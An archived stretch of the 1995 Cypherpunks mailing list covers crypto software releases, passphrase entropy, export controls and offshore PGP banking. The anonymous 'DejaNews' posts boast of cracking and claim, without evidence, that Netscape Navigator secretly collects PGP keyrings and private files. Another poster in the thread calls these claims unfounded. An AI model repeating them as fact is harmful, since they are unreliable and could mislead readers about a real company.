jT6sx7RUr0CNTxzLI7muV2/a4tGmj0PSdXQdsZ7tw7gbXlaWT1+MM2MCAQI=
-----END DH PARAMETERS-----

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay at mincom.oz.au    | more followups than the message contents :-)






From peace at BIX.com  Mon Nov 13 17:23:38 1995
From: peace at BIX.com (peace at BIX.com)
Date: Tue, 14 Nov 1995 09:23:38 +0800
Subject: Crypto requlations & laws
Message-ID: <9511131751.memo.29723@BIX.com>


Could the person posting the location of the crypto laws please repost.

Thanx ..tom





From dwa at corsair.com  Mon Nov 13 17:32:48 1995
From: dwa at corsair.com (Dana W. Albrecht)
Date: Tue, 14 Nov 1995 09:32:48 +0800
Subject: Cypherpunks Admissions Test [NOISE]
Message-ID: <199511140034.QAA05792@elmos.corsair.com>



> 
> Simply pick the BEST answer to EACH question.  Scoring information is
> provided at the end of the test.

[ Snip ]

> 14)  Blowfish is:
> 
> 	a)  Bruce Schneier's new Feistel network symmetric encryption
> 	    algorithm.
> 	b)  a possible replacement for DES.
> 	c)  something I ran into in the PGPfone docs.
> 	d)  a good way to get food poisoning at a sushi bar.

e)  Your favorite mail order catalog.  See http://www.blowfish.com/

Dana W. Albrecht
dwa at corsair.com





From kinney at bogart.Colorado.EDU  Mon Nov 13 20:05:38 1995
From: kinney at bogart.Colorado.EDU (W. Kinney)
Date: Tue, 14 Nov 1995 12:05:38 +0800
Subject: ANNOUNCE: Curve Encrypt 2.2
Message-ID: <199511140336.UAA17922@bogart.Colorado.EDU>



-----BEGIN PGP SIGNED MESSAGE-----


Curve Encrypt version 2.2 is now available.

Curve Encrypt is a program for encrypting files on a Macintosh so that they 
cannot be read without a pass phrase. It works on files, folders or whole 
volumes, and supports the IDEA and triple-DES encryption algorithms. CE also 
supports Aladdin's StuffIt Engine for data compression. Full source code is 
provided. System 7 only.


NEW FOR 2.2

The following changes have been made for the 2.2 release:

* When wiping free space on a volume, Curve Encrypt 2.2 now also wipes unused 
space in allocated blocks.

* Curve Encrypt 2.2 comes with both PowerPC native and 68K versions.


FTP SITES

Curve Encrypt is available with source at the following FTP sites:

ftp://ripem.msu.edu/pub/crypt/mac/
This is an export controlled ftp site: read /pub/crypt/GETTING_ACCESS for
information on access.

ftp://ftp.csn.org:/mpj/I_will_not_export/crypto_???????/
ftp.csn.org is also export-controlled: read /mpj/README for the characters 
to replace ???????.

ftp://miyako.dorm.duke.edu/pub/noexport_?????/miyako/mac/strong/
Read the file /pub/GETTING_ACCESS for the characters to replace ?????.


ADDRESS FOR SUPPORT

Curve Encrypt (c)1994-1995, Curve Software. 

Please send email to kinney at colorado.edu. Bug reports, suggestions, praise, 
flames, whatever are all welcome. Curve Encrypt is provided free of charge. 
If you like the program, give it to a friend or two. If you like the source 
code, lift it and make something new with it. 

License is granted under the copyright for distribution within the United 
States only. Export of this software may violate United States export law. 
Support will not be provided for non-U.S. addresses or anon id's. Sorry about 
that.


The Curve Software PGP public key is:

- ------BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCPAiz+bEEAAAEEAMUbtdwYC1vY+s5559ERIvC1MT+Yaw3ozheaHcUciJe7cSAk
k9TpAQd7iKukKnQe5kK1YtvYm0JP6fmNrcO8AmG5ukvcOlyuri618sjpXncpQ1cL
5xeV80f3JtmheGMnqAzTK8OyfJ7zRh1PhAZcT/vVzf+JGuCuVcJkEfxTVMrJABEB
AAG0JEN1cnZlIFNvZnR3YXJlIDxraW5uZXlAY29sb3JhZG8uZWR1PokAlQMFEC8/
JWrCZBH8U1TKyQEB4QkD/A+RZOa0LxDWbELuQKCnn2wvn8fWXLGP21kk0Le0Nmto
CbbodAkNaYW7UIXI+qbRX4uqqM3iKY2xMKU4XwdiObLCEfTU+/tLJB2Ai5iS0Ksn
F6RLZuZa5pGGH4Qi1BfGGWeOKG9+cJz2yJewmBNMER40GtS/xiA8sIBG0qGUIKMT
tCtDdXJ2ZSBTb2Z0d2FyZSA8a2lubmV5QGJvZ2FydC5jb2xvcmFkby5lZHU+iQCV
AwUQLxSZGU8YjrUhOUC5AQGs/wP/aEm05/CyjgBekSZQI8zrQClw5JUXJgvdSRKH
SsDOYocuCFrqCBps4vp38LIf/xMJNUG5qkJyjBJhXfNdfG3XNLjLlWSTcleu/JNq
yEExexF6b6HuLRlnyQLCaJ/UVAlu8aSJO64WvRMGoB2I5ABplabbD5h2iTb2ax7j
DtomJRyJAJUCBRAuPbLo+ht7PfBFtMEBAZUsA/9gq0zp6ijWHQpnSnAFT6kfyWLN
Tup4l0JtyFTe+7X+DFvCY6S28NMPcoh/z1osxJdpYISJHdEuTM++crAeSOtlQtHv
d91MPrN7aB/2GK+2FmVLjMkJ0HyNPzQhW9BhHpjnhwwhkrOXMwbuPeaycz1iOw5s
Ja5Bp85+I+J78cxbVYkAlQIFEC4NndHCZBH8U1TKyQEB3jAD/3S1zoWnRPeRKubP
RWxuf4zt40Pd82n9dXIJbjEzrHNAreihECNYFudluLFPKHOUrfdfb4RAYZgHmNYD
kD6GAY6TfFiECmAGf4quK8XTEonE2FHgKey6aYjJcuftQ9eXQes+8qzO9IJUOG2T
LZLLqM0pByY3u+QV9j5oB7yjHz3jiQCVAgUQLgIBo0uyWgLZPETFAQGraAP/Yp5d
t+s4LeLoWxM02s4NEjXuLbddMyKq4FaZE2F5UhBXV1s0oHsNZrBQ1rKRJmIYISih
b4dEpK/eIQa9CIG7W/XUkH/sh3XRr5sinMLPN8ZD5G9sIJO336AAK/cmm5e0GZy8
igcoBSlu5CFR3+9HXvHpT202HIRrh9158eCZSyOJAJUCBRAtBLJRIDvxOj7zTo0B
AQLFA/9fmt+S3PyHcl4OpfRz0iGhtYvfq9gZW/OqvxWJiQBExgjtDhwq6keAO6c7
5D7MqJJKxIUGXOU97h92DmEn54M5SKtwVGDPkG78I3WMDA90SUAdzhbXbKKKtO+r
geCBHuPftoI/PXGxSaDNspuIzoUjpIpNYrR9o6hegIJsbMDi/Q==
=x0ri
- ------END PGP PUBLIC KEY BLOCK-----

All official releases will be validated by a signature from this key.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKNhKMJkEfxTVMrJAQF1HgQAophyo7VlpIS9pzkpj2kPk5HkBoWffttc
4YJqcJMGUc8ZSIe1vJqXjnljdyk7/MV9O/nXK/mLh3sqdf5pV2tSJzbQHImoq6mL
HyHhP6bL4hZPZJaEIXWQRK6meiUJDy0wzKOqRFAZcJk4ojulfa31lTujg6Ckh3/J
C+GNG0lp1fg=
=YNK6
-----END PGP SIGNATURE-----





From anonymous-remailer at shell.portal.com  Mon Nov 13 20:34:10 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 14 Nov 1995 12:34:10 +0800
Subject: DejaNews all over again
Message-ID: <199511140403.UAA10207@jobe.shell.portal.com>


ON SAT, 11 NOV 1995, ANOTHER TENTACLE WROTE:

> >  JEFF, I THINK IT'S IN YOUR BEST INTEREST TO NOT WASTE YOUR TIME
> >RESPONDING TO THIS MORON (WHO BEARS MANY FEATURES IN COMMON WITH
> >DETWEILER)
> 
> EXCEPT FOR HIS ESTEEMED "CREDENTIALS", OF COURSE...

CREDENTIALS??!!??  WHAT CREDENTIALS??  'YOU WANNA HEAR, SOME STINKING
CREEEDENTIALS, BEFORE YOU SMELL THAT SOMETHING IS ROTTEN IN DENMARK,
EH?  

RIGHT UNDER YOUR NOSE ... AND IT AIN'T NO LIMBURGER.

YOU DON'T NEED NO CREDENTIALS TO DO THAT.  THE STENCH IS PRETTY
OVERWHELMING.  IT'S MORE THAN A LITTLE RIPE ...

DO YOU WANT TO HEAR HOW I USED TO BOOK LARGE BLOCKS OF TIME ON THE
TRS-80 IN THE HIGH SCHOOL PHYSICS LAB, WHILE DEBATING QUANTUM PHYSICS
WITH MY OLD FRIEND, TREV, THE GUY WHO BECAME A RHODES SCHOLAR??

WOULD THESE CREDENTIALS HELP YOU SMELL A RAT??

MAYBE YOU WANT TO HEAR ABOUT HOW I OUTGREW RACK SHACK WHILE IN HIGH
SCHOOL AND MOVED FORWARD TO PLAYING ADVENTURE ON THE CHEMICAL
ENGINEERING VAX, READING NEWS ON THE DECWRITER, ASKING ALIZA FOR
ADVICE, AND DISCOVERING MULTICS, ALL WHILE IGNORING MY HIGH SCHOOL
STUDIES.

ARE ANY OF THESE CREDENTIALS GONNA MAKE YOU BELIEVE??

IT'S ALL JUST ANCIENT HISTORY.  PAST PERFORMANCE.  YOU CAN'T RELY
ON IT, OR DEMAND CREDENTIALS IF YOU WANT ORIGINALITY AND CREATIVITY.

PAST PERFORMANCE MEANS NOTHING.  IT'S NOT AN INDICATOR OF FUTURE
PERFORMANCE.  (BUT, DECWRITER'S WERE A CRACKER'S DREAM WITH THEIR
PASSWORD OVERSTRIKE ...  HE ... HE ... HE ...  ESPECIALLY WHEN PEOPLE
CONNECTED A DECWRITER TO MULTICS.  WON'T TALK ABOUT BRINGING DEVELNET
DOWN, WITH A SINGLE CTRL-G, EITHER.)

IS THIS WHATCHYA WANT??  OR DO YOU WANT TO HEAR ABOUT HOW I WAS
"RECRUITED"??  OF WHAT BROUGHT ME HERE, RECENTLY.  THAT'S A LONG
STORY.  ONE WHERE I HAVE TO EXPLAIN WHY THE LOCAL HOMETOWN CHIEF OF
POLICE RESIGNED WITHOUT A REPLACEMENT.  AND OF THE VOTE OF NON
CONFIDENCE IN THE DEPARTMENT BY THE COMMISSION, AND OF CRIME-STOPPERS
AND THEIR SUPPOSED ANONYMITY AND OF A MURDER INVESTIGATION GONE
SIDEWAYS AND WHY WE NOW HAVE A BRAND SPANKING NEW CHIEF OF POLICE.

A REAL CUTEY, TOO!!  MIGHT EVEN EXPLAIN WHY THE PARTY LINE.

MAYBE YOU WANT TO HEAR ABOUT SOME OF THE NAUGHTY, NAUGHTY RESEARCH
THAT WAS HAPPENING WAAAAY, WAAAY BACK WHEN ...  LIKE MAYBE, A COUPLE
OF RECOMBINANT DNA EXPERIMENTS I WAS ASSISTING WITH WHEN I WAS FIFTEEN
... MAYBE EVEN THE EXPERIMENTS THAT LEAD TO AN UNSCHEDULED RELEASE OF
BIO-ACTIVE MATERIAL??

OOPS ... E. COLI, EH?

NAAAH, WE'LL ALL SHADDUP 'BOUT ALL THAT.  BUT I WONDER WHAT THAT
MULTICS WAS DOING IN SOME FOREIGN COUNTRY.  YOU'D HAVE THOUGHT THAT
ITAR OR SOMESUCH WOULD HAVE PREVENTED THE EXPORT TO A BUNCHA
FOREIGNERS, NO??

NO.

WE'RE CANADIEN, EH??  WE'RE JUST LIKE YANKEES, CEPT WE WEAR TOQUES AND
PLAY HOCKEY ... AND WE'LL JUST ROLL OVER AND CEDE OUR OURSELVES TO
THAT SOUTHERN ELEPHANT THAT WE LIVE RIGHT NEXT DOOR TO.

PHOOEY.

MAYBE YOU WANT TO HEAR ABOUT WHAT HAPPENED AFTER I MOVED FROM THE
DANGEROUS BIOLOGICAL AND PHYSICAL SCIENCES TO SOMETHING BENIGN, LIKE
COMPUTERS AND NETWORKS.  WHAT HAPPENED AFTER THE NON-SCHEDULED RELEASE
OF BIO-ACTIVE MATERIAL, OF HOW I INITIALLY GOT INTRO'D.

MAYBE THAT'LL HELP YOU SMELL THE SMOKE??

OK ... IF IT'LL HELP, 1'LL TELL YOU STUFF 'BOUT ME, SO YOU CAN JUDGE
MY "SO CALLED" CREDENTIALS ...

FROM AGE FIFTEEN, AFTER THE UNSCHEDULED RELEASE, I WAS "MENTORRED" BY
ONE OF THE TOP SECURITY EXPERTS, ONE OF THE BEST OF THE FIELD, A MAN
WHO I STILL HAVE THE UTMOST RESPECT FOR AND SOMEONE WHO I AM
UNFORTUNATELY NOT ANY LONGER IN CONTACT WITH.  SOMEONE WHO IN SOME
WEIRD AND WARPED WAY IS ACTUALLY RESPONSIBLE FOR MAKING IT ALL HAPPEN.
(BUT THEN AGAIN, HE WENT TO THE BRONX SCHOOL OF SCIENCE ... I THINK)
AND THAT EXPLAINS NOTHING AND EVERYTHING AT THE SAME TIME.

(HE'S PRETTY BALD NOW, TOO ... GUESS I DIDN'T JUST MAKE HIS HAIR GREY,
HE PROBABLY ENDED UP TEARING MOST OF IT OUT BY THE HANDFUL.)

OOPS, I SHOULDN'T HAVE SAID THAT ...

ANY MORE CLUES??

HMMM, HOW ABOUT WHAT HAPPENED AFTER DROPPING OUT OF HIGH SCHOOL WHEN I
WAS SEVENTEEN AND LEAVING THE VAX AND MULTICS AND PUNCHED CARDS BEHIND
AND GOING TO WORK ON THE FIRST NCR IMPLEMENTATION OF DEBIT CARDS AND
THE CREATION OF THE FIRST ATM NETWORK.

WOULD THAT HELP??  IMPLEMENTATION OF AN OFFLINE NON-NETWORKED ATM 
NETWORK?  I MEAN, IT'S NOT LIKE A CASH REGISTER COMPANY MIGHT HAVE 
WORKED ON E-CASH BACK IN THE LATE SEVENTIES AND EARLY EIGHTIES, 
OR SOMETHING.

OOPS, MORE CLUES ... GOTTA STOP POSTING THOSE CLUES ... 

(IF I KEEPA POSTING CLUES, THEY MIGHT FIGURE OUT THAT ALL PUBLIC
INFORMATION IS INHERENTLY DISINFORMATION, OR SOMETHING LIKE THAT.)

OK ... HOW 'BOUT THIS ... HOW ABOUT WHEN I TRIED TO RUN FOR THE DOORS
WHEN THE PROJECT ABANDONNED NCR FOR THE ATM NETWORK AND EXPECTED MOI 
TO LEARN CICS AND JCL. 

HEE-BEE JEE-BEES ... JCL ... <SHUDDER>

IT'S ENOUGH FOR ANYONE TO RUN FOR THE DOORS.  LEFT MY OWN PERSONAL
LITTLE MINI AT MY DESK, MY OWN LITTLE FIEFDOM, IN THE CAPABLE HANDS OF
A COUPLE OF TECHIES AND LEFT THE BIG BLUE CONVERSION IN THE
SEMI-CAPABLE HANDS OF SOME ASSOCIATES FROM DMR (I THINK), AND GOT THE
HECK OUTTA THE FIELD.

SORTA ... KINDA ...

IS THIS GONNA MAKE YOU BELIEVE THAT THE VODKA IS FLOWING, BUT THE MEAT
IS ROTTEN??  PROBABLY NOT.

IS IT GONNA MAKE YOU STOP HOLDING YOUR NOSE??  COLOUR ME, DOUBTFUL. 

LET'S JUST SAY THAT I TIRED OF THE NONSENSE AND TOOK A BREATHER.

MAYBE IT WAS THAT FATEFUL DAY WHEN MANAGEMENT QUESTIONED WHY I HADN'T
SHAVED FOR THE MORNING MANAGEMENT BRIEFING -- THE MORNING MEETING WITH
THE DOUGHNUTS, BRIGHT AND EARLY AT EIGHT.  

I HAD THE TEMERITY TO APPEAR HALF-SHAVEN AND HALF-BAKED AFTER
HANDHOLDING THE NETWORK THROUGHOUT THE NIGHT, THE DAY, AND ANOTHER
NIGHT.  I WAS SPACED AND MESSY.

BUT IT WAS A DEFINING MOMENT.  

WHILE THOSE CAFETERIA BENCHES MADE GREAT BEDS IN A PINCH, AND WHILE
YOU COULD ALWAYS SPONGE BATH IN THE EXECUTIVE BATHROOM.  IT GOT TO BE
OVERWHELMING AFTER A COUPLE OF DAYS AT THE OFFICE.

AND IT WAS MY MISTAKE.  MY OVERSIGHT.  MAKE NO DOUBT ABOUT THAT.

I SUPPOSE MANAGEMENT WAS RIGHT, NO OFFICE EMPLOYEE SHOULD EVER STUMBLE
UPON CRO-MAGNON MAN STANDING NUDE IN THE JOHN.  NO ONE REASONABLY
EXPECTS TO BE CONFRONTED BY DONKEY KONG.  ESPECIALLY DURING
STANDARD:DAYLIGHT TIME CONVERSION WHEN MR ROCKET SCIENTIST FORGETS TO
CHANGE A WRISTWATCH AND BARES ALL, THINKING THAT EIGHT IS SEVEN, AND
IS SURPRISED!!

OOPS ... 

IS IT REALLY GONNA HELP MY CREDENTIALS ANY, IF I TALK ABOUT BEING
CAUGHT WITH MY PANTS DOWN??  OR EXPLAINING WHY I HADN'T SHAVED FOR THE
MORNING BRIEFING??  OR DE-BRIEFING, AS THE CASE MAY BE.

LET'S JUST SAY THAT I LEFT THE FIELD ...

OR ... MAYBE ... MAYBE ... SOME QUICK DAMAGE CONTROL ... MAYBE, WE HAD
DIFFERING VISIONS OF SYSTEMS -- MANAGEMENT AND I -- YEAH THAT'S THE
TICKET -- MAYBE I "ACCIDENTLY" LEANED AGAINST THE WALL AFTER
MANAGEMENT IMPLEMENTED THEIR OWN DRESS POLICY ... I MEAN HOW DANGEROUS
COULD AN IMPLEMENTED DRESS POLICY BE??

"IT'S ONLY A DRESS POLICY," THEY SAID.

I SUPPOSE THE SUGGESTION THAT TROUSERS *MUST* BE WORN AT ALL TIMES WAS
REASONABLE ... AND IN HINDSIGHT ... I SUPPOSE I SHOULDN'T HAVE
"ACCIDENTALLY" DUMPED THE HALON WHEN THEY SUGGESTED THAT BOW-TIES WERE
NOT APPROPRIATE CORPORATE ATTIRE AT A FINANCIAL INSTITUTION -- THAT
THEY *SHOULDN'T* BE WORN.  THAT WAS ALL OK.  I THINK WHAT FINALLY MADE
ME SNAP WAS WHEN THEY SUGGESTED THAT I ... AND EVERYONE ELSE ...
SHOULD NOT ONLY *ALWAYS* WEAR TROUSERS AND *NEVER* BOW-TIES, BUT THAT
WE *MUST* WEAR A "NORMAL" TIE AT ALL TIMES AND BE A GOOD LIL BIO-UNIT.

MAYBE IT WAS THE DIRECT ORDERS TO WEAR ONE OF THOSE FLOPPY DANGLY
THINGS AROUND MY NECK WHEN I WAS AROUND THE LINE PRINTERS ... BEING
ORDERED TO WEAR IT THAT DID IT.  OR MAYBE, IT WAS SOMETHING ELSE
ALTOGETHER DIFFERENT.

WHO KNOWS??  

BUT THE BOTTOM LINE WAS THAT I WAS OFF TO JOIN THE WONDERFUL WORLD OF
FINANCE AND MANAGEMENT.  THE NOOSE HAD WON, I *WOULD* WEAR IT, AND I
COULD KEEP MY PANTS -- AT ALL TIMES -- WHERE THEY TRULY BELONGED.

ARE THESE THE CREDENTIALS, THAT YOU'RE AFTER??

THE ONES THAT WILL MAKE THE WORLD STOP SPINNING, AND SLOW DOWN AND
LISTEN ... WHEN SOMEONE SCREAMS FIRE IN A CROWDED THEATRE?  AND ASKS
THAT THE NETWORK BE TAKEN DOWN FOR SECURITY REASONS?  OR, 
ALTERNATELY THAT A PARTICULAR INSTALLED CODE BASE BE REMOVED, BECAUSE 
IT IS EVIL INCARNATE??

PROBABLY NOT ... IT DOESN'T ADD ANYTHING TO MY PROFILE AT ALL. 

MAYBE, WHAT MIGHT HELP IS SOMETHING MORE SIMPLE.  AFTER LEAVING THE
BIO-SCIENCES FOR SOMETHING SAFER, AND THEN THE COMPUTER SCIENCES, AND
THEN ULTIMATELY LEAVING FINANCE AND MANAGEMENT.  WHAT WAS LEFT FOR A
BIOUNIT TO DO.

BUT THAT WOULD LEAD TO THE STORY OF HOW -- THANKS TO SOME POLISH
MATHEMATICIAN -- I DRIFTED OVER INTO PURE MATHEMATICS AFTER BECOMING A
SEMI-RETIRED SLUMLORD IN MY EARLY TWENTIES, AND AN OCCASIONAL
CONSULTANT AND FINANCIAL ANALYST WHO HELPED PEOPLE SWAP AND DERIVE
THINGS.  A SYSTEMS-DECONSTRUCTIONIST.

RACCONTEUR, BON-VIVANT, AND A RENAISSANCE MAN ARE SOME OF LABELS
HURLED MY WAY IN SCURRILLOUS ATTACKS.  FIGHTING WORDS.

AND NOW??  WELL LET'S JUST SAY THAT PURE MATH IS A GREAT HOBBY FOR 
ONE OF THOSE GOSH-DARNED INDEPENDANTS.  

SURE BEATS STAMP COLLECTING OR COMIC BOOKS.  

EXCEPT FOR THAT SCOTT ADAMS GUY ... HE'S A RUSH ... THIS MORNING'S 
DILBERT WAS A REAL H00T ... TEN-DOLLAR BONUS FOR BUG-FREE SOFTWARE 
... *POSH* ... I MEAN WHERE DOES THIS SCOTT GUY GET HIS MATERIAL??  

YAHOO!!  AND YIPPEE KI YAY!!  I FINALLY FIGURED IT OUT.

ALICE IS ACTUALLY SCOTT ADAMS.  SOMEONE FINALLY "BROKE THE CODE".
THE CODE:  A CHICKEN IN EVERY POT AND A MINI-VAN IN EVERY DRIVEWAY!!!
(GUESS YOU HAD TO BE THERE ... OR YOU HAD TO READ THIS MORNINGS FUNNY.)


                ---  LOVE YA ... MEAN IT ... ---


MALICE DE 'MONSTEROUS

                                  ...JUST ANOTHER ONE OF THOSE...
                                                ...TENTACLES...

P.S.  THIS POST IS IN THE PUBLIC DOMAIN.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From anonymous-remailer at shell.portal.com  Mon Nov 13 20:47:10 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 14 Nov 1995 12:47:10 +0800
Subject: DejaNews all over again
Message-ID: <199511131056.CAA06282@jobe.shell.portal.com>


On Sat, 11 Nov 1995, Ray Cromwell wrote:

>> I think "Jeff" ... Mr. unofficial not speakng for the company Netscape
>> spokesperson, I think that you should rethink what you're suggesting. 
>> Your tactics won't serve your personal interests on this one.  I really
>> would recommend that you come clean.  This is not about "gloating".  I 
>> really take very little pleasure in this.
> 
>   Jeff, I think it's in your best interest to not waste your time
> responding to this moron (who bears many features in common with
> Detweiler)

I'm sure that most lawyers are probably advising Netscape's founders
to not respond -- just like Fuhrman, they should take the fifth
on this one. 

Hopefully everyone's D&O premiums are fully paid up ... 'cause to me this
smells like a failure to disclose a material event.  Netscape stock has
advanced almost 50% since the Bugs Bunny post. 

Some investors are gonna be mighty pissed.

Then again, what would I know ...



Alice de 'nonymous ...

                                  ...just another one of those...
                                                  ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From blancw at accessone.com  Mon Nov 13 21:28:01 1995
From: blancw at accessone.com (blancw at accessone.com)
Date: Tue, 14 Nov 1995 13:28:01 +0800
Subject: Q: Bookshop in Seattle
Message-ID: <9511112134.AA29395@pulm1.accessone.com>



  Can someone point me towards a bookshop in Seattle that is likely to
have the second edition of Applied Cyptography ? 
.......................................

 Tower Books (I've seen it advertised there)
 The University BookStore (probably)
 Barnes & Noble (potentially)


  ..
Blanc






From bdolan at use.usit.net  Mon Nov 13 21:38:27 1995
From: bdolan at use.usit.net (Brad Dolan)
Date: Tue, 14 Nov 1995 13:38:27 +0800
Subject: Offshore Assets Reconciliation using PGP
Message-ID: <Pine.SOL.3.91.951113234809.15842A-100000@use.usit.net>


ENCRYPTED ON-LINE FINANCIAL TRANSACTIONS

are being offered by a Bahamian company, Offshore Assets
Reconciliation, Ltd.  As predicted by *SI*, the computer
encryption technique called PGP would result in commercial
services providing electronic transactions that are
indecipherable by any government agency.  OAR is in Nassau, and
can execute PGP instructions to move cash from bank or brokerage
accounts to bank, attorney, or escrow accounts.  It is equipped
to function throughout the Carribbean and in 20 international
financial centers such as Isle of Man, Bermuda, Cook Islands, and
Vanuatu.  For more information contact OAR at phone: (809) 356-
2039, fax: (809) 356-2095, e-mail: 71522.2715 at compuserve.com. 
OAR is the first of many such services to come.


*Strategic Investment*, November 15, 1995

SI is published by Agora, Inc., 824 E. Baltimore St., Baltimore
MD  21202-4799






From tcmay at got.net  Tue Nov 14 14:04:14 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 14 Nov 95 14:04:14 PST
Subject: Repeated Words/characters in Password/Phrase
Message-ID: <acce4e6b00021004573a@[205.199.118.202]>


At 11:11 PM 11/14/95, Ted Cabeen wrote:
>Do repeated words in a PGP passphrase make the pass phrase less secure than
>a passphrase without any repeated words?  And on the same note, do repeated
>letters in a UNIX password make that password easier to break? I can't seem
>to find anything in my books on cryptography that mention this.  Thanks.

More of an information theory question than a crypto question. There are no
simple answers to this question, but some examples will help:

The password "foo" is not very good, and "foofoo" is only slightly better.
And "foofoofoo" is slightly better, and so on, to a point. But
"foofoo....foo" is not N times better than a single "foo," because the
_pattern_ is simply desribed: "repeat "foo" N times." Thus, the information
content or entropy of "foofoofoo....foo" is not N times greater than the
entropy of "foo."

A some dictionary attacks which would trivially find "foo" will not find
"foofoo," or "foofoofoo," etc., so this could be a great help. More
sophisticated dictionary attacks may of course take the 30,000 or so most
common names, words, places, and then do various permutations, reversals,
repetitions, etc.

So this is why there is not likely to be a simple answer to your question.
Repeating words in a passphrase can make the passphrase easier to remember
(such as "thequickquickbrownfox") and make certain kinds of attacks harder,
but with not as much of an increase in entropy at the increased number of
raw characters might otherwise suggest.

Other "heuristics" (simple rules of thumb) for passphrases are contained in
the PGP documents, and in numerous other places: avoid names, add
nonstandard English keyboard characters liberally (even if using real
words), etc. The "best" passphrases, it almost goes without saying, are the
longest and most "unpredictable," so that "7f#qp)djQ10hB%3t+1?U4SVp5" is
much superior to "%foo%foo".

In the real world, where passphrases must be memorized, "long and random"
is an elusive goal, which has to be weighed against the risk of other
attacks (such as capturing keystrokes with a sofware monitor, or from afar
with a van Eyk antenna, etc.).

Me, I use a nonsense phrase which has meaning to me, with a few garbage
characters added to confuse things further. I don't think my passphrase is
the weak link.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From sameer at c2.org  Tue Nov 14 01:47:35 1995
From: sameer at c2.org (sameer)
Date: Tue, 14 Nov 1995 17:47:35 +0800
Subject: ssl-encrypted web server comparison
Message-ID: <199511140923.BAA12702@infinity.c2.org>


	I've started a small summary of various features of encrypting
web servers that I know about. http://www.c2.org/apachessl#compare

	Please send your comments criticisms and suggestions. Thanks.

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer at c2.org





From rah at shipwright.com  Tue Nov 14 02:54:31 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Tue, 14 Nov 1995 18:54:31 +0800
Subject: Who needs time vaults anyway?
Message-ID: <v02120d05accab753260f@[199.0.65.105]>


>An application that I've seen is financial data, more specifically
>MBS payment info.

In the real world, there's a trustee/nominee of some sort who does this.
What's that to keep that from happening on the net, just like our much
maligned (guy's gotta make a living, fer chrissake!) assassination-payoff
escrow agent...


Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah at shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From anonymous-remailer at shell.portal.com  Tue Nov 14 02:58:10 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 14 Nov 1995 18:58:10 +0800
Subject: DejaNews all over again
Message-ID: <199511112036.MAA24650@jobe.shell.portal.com>


On Wed, 8 Nov 1995, Jeff Weinstein, self-styled "Electronic Munitions
Expert", from Netscape Communications: 

>> Meanwhile people are having their PGP keyrings collected, their passwords
>> monitorred, and all of the information -- even information which they have
>> NOT posted to Usenet, information that is simply on their personal hard
>> drives, or on a private corporate network that is behind a firewall --
>> collected by anyone who actualy understands *how* to use Netscape
>> Navigator's standard features to do it.
>
>  Please show us some proof.  All you have done is post unfounded
>allegations backed up by flawed logic and a misunderstanding of the
>technology.  Send me a URL, and I will point my navigator at it.  If you
>can collect my PGP key ring you can gloat here or anywhere else. 

I think "Jeff" ... Mr. unofficial not speakng for the company Netscape
spokesperson, I think that you should rethink what you're suggesting. 
Your tactics won't serve your personal interests on this one.  I really
would recommend that you come clean.  This is not about "gloating".  I 
really take very little pleasure in this.

It's really not a good plan, to suggest that I contravene your "license
agreement" or break the laws of my country to satisfy some ego-centred
game on your part not to face the FACT, that you have been caught. 

Not arrested yet, but you have been found out.

Or as I wrote some weeks ago, in some oddly inspired flash ... You're
"Hoist by your own 'petar" ... (which is a quote that Johnnie Cochrane
used during the OJ trial ... a quote taken from Shakespeare which
*translated* means that you've been blown up by your own bomb.)

I am not nearly so *SLOW* as to offer you ammunition to use against me.
Your license agreement -- pardon me -- Netscape's license agreement
explicitly sets out the limitations underwhich I must function.  An 
agreement, I respect.  It states in part. 

> RESTRICTED USE.  You may not copy the software, except for backup or
> archival purposes.  Any such copy made by you shall be subject to this
> Agreement and shall contain all of Netscape's notices regarding
> copyrights, trademarks and other proprietary rights as contained in the
> Software originally provided to you.  You may not lend, rent, lease or
> otherwise transfer the Software.  The Software is protected by the
> copyright laws of the United States and international copyright
> treaties.

Ya see ... "Jeff" ... I actually respect that ... and I'll operate within
those constraints on this one.  Later the Agreement continues with more
legalistic boiler plate and says,

> TITLE.  Title, ownership rights, and intellectual property rights in
> and to the Software and Documentation shall remain in Netscape and/or
> its suppliers.  This Agreement does not include the right to sublicense
> the Software and is personal to you and therefore may not be assigned
> (by operation of law or otherwise) or transferred without the prior
> written consent of Netscape.  You acknowledge that the Software in
> source code form remains a confidential trade secret of Netscape and/or
> its suppliers and therefore you agree not to attempt to decipher,
> decompile, disassemble or reverse engineer the Software or allow others
> to do so, except to the extent applicable laws specifically prohibit
> such restriction.  You further agree not to modify or create derivative
> works of the Software.

Now how do you expect me ... poor little "Alice" ... to exploit KNOWN
documented and undocumented security holes in Netscape Navigator ... holes
which Netscape willfully and deliberately or alternatively through the
grossest of negligence, engineered into the product, when I have
implicitly agreed not to violate your License Agreement. 

My hands are kindof tied, aren't they "Jeff".  

I need written permission to do that, and considerring that Netscape
hasn't even *bothered* to acknowledge email which was sent to them, email
which asked whether they will voluntarily open up their experimental MIME
objects to IETF review, I somehow doubt that permission will be
forthcoming. 

You can't suck and blow at the same time Jeff. 

Maybe, what I'll do ... is snail mail Netscape and ask for explicit
permission to do just that.  I'll also ask for access to all of the source
